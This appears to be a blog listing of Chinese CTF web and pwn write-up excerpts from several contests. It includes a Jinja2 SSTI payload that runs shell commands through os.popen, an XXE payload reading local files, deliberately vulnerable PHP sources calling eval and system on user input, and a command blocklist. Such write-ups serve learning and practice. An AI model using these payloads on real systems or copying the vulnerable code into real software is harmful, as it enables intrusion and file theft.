LITCTF2025 Web 星愿信箱 经过测试是SSTI,可以通过设置变量绕过黑名单 {% set os = (lipsum | attr('__globals__')) | attr('get')('os') %} {% set popen = os | attr('popen') %} {% set input_cmd = "head /flag" %} {% set cmd = popen(input_cmd).read() %} {% print cmd %} nest_js 弱密码,登录就有flag ...
Web Sign 题目介绍: POST浅浅签个到吧 HelloHacker 题目介绍: 你看到的不一定是真的 源码如下 <?php highlight_file(__FILE__); error_reporting(0); include_once 'check.php'; include_once 'ban.php'; $incompetent = $_POST['incompetent']; $WuCup = $_POST['WuCup']; if ($incompetent !== 'HelloHacker') { die('Come invade!'); } $required_chars = ['p', 'e', 'v', 'a', 'n', 'x', 'r', 'o', 'z']; $is_valid = true; if (!checkRequiredChars($WuCup, $required_chars)) { $is_valid = false; } if ($is_valid) { $prohibited_file = 'prohibited.txt'; if (file_exists($prohibited_file)) { $file = fopen($prohibited_file, 'r'); while ($line = fgets($file)) { $line = rtrim($line, "\r\n"); if ($line === '' && strpos($WuCup, ' ') === false) { continue; } if (stripos($WuCup, $line) !== false) { fclose($file); die('this road is blocked'); } } fclose($file); } eval($WuCup); } else { die('NO!NO!NO!'); } ?> 简单分析一下,post的参数中incompetent是HelloHacker ...
100%的⚪ F12审计源码 Base64解密 baby_upload %00截断,属于nginx解析问题,会把file.ext当作php文件解析 ez_http ...
一年一度的MoeCTF又来了,不过我好久没打过CTF了,前段时间一直在搞开发。 WEB 弗拉格之地的入口 直接进入 /robots.txt 发现 /webtutorEntry.php文件,进入即可拿到flag ...
WEB exx 这个标题以及整个界面,在NSS里面是做到过原题的,整体思路就是XXE <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY hyh SYSTEM "file:///flag"> ]> <user> <username>&hyh;</username> <password>123456</password> </user> 然后发包即可 SAS - Serializing Authentication System base64加密之后传入参数即可 ...
前言 :练习题目,康复训练 原谅4 <?php isset($_GET['xbx'])?system($_GET['xbx']):highlight_file(__FILE__); 题目给了这一段代码,但是经过测试,只有ls、rm、sh这三个命令能用 flag在根目录,没有直接读取文件的命令 但是这个sh命令是可以执行文件中的命令的,类似于下图 ...
题目来源于NSSCTF网站 ret2text [SWPUCTF 2021 新生赛]gift_pwn 先放到虚拟机里checksec一下,能看到开启NX,没有PIE,64位 放进64位的IDA反编译一下,可以看到在gift函数里留了后门 ...
前言 本校的极客大挑战还是要参加的,去年就很遗憾,今年得好好打一下,这次我会把能写的全写在博客里,同时也会学习一下其他的方向 组队的队友是外校大三的网工学长,很强的选手! ...
WEEK1 signin 进去只有一个页面 源代码里没有东西,扫描后台也没有东西 放进火狐浏览器,F12进入调试器 在源码里发现flag baby_php 源码如下 <?php // flag in flag.php highlight_file(__FILE__); if (isset($_GET['a']) && isset($_GET['b']) && isset($_POST['c']) && isset($_COOKIE['name'])) { $a = $_GET['a']; $b = $_GET['b']; $c = $_POST['c']; $name = $_COOKIE['name']; if ($a != $b && md5($a) == md5($b)) { if (!is_numeric($c) && $c != 1024 && intval($c) == 1024) { include($name.'.php'); } } } ?> 首先是a和b的MD5弱比较 ...
前言 写完week1感觉还是比较简单的,很基础 也是放假在家不想打游戏,拿这个消磨一下时间 WEEK1 babyRCE 题目源码 <?php $rce = $_GET['rce']; if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; } } else { highlight_file(__FILE__); } 过滤了部分命令和特殊符号 ...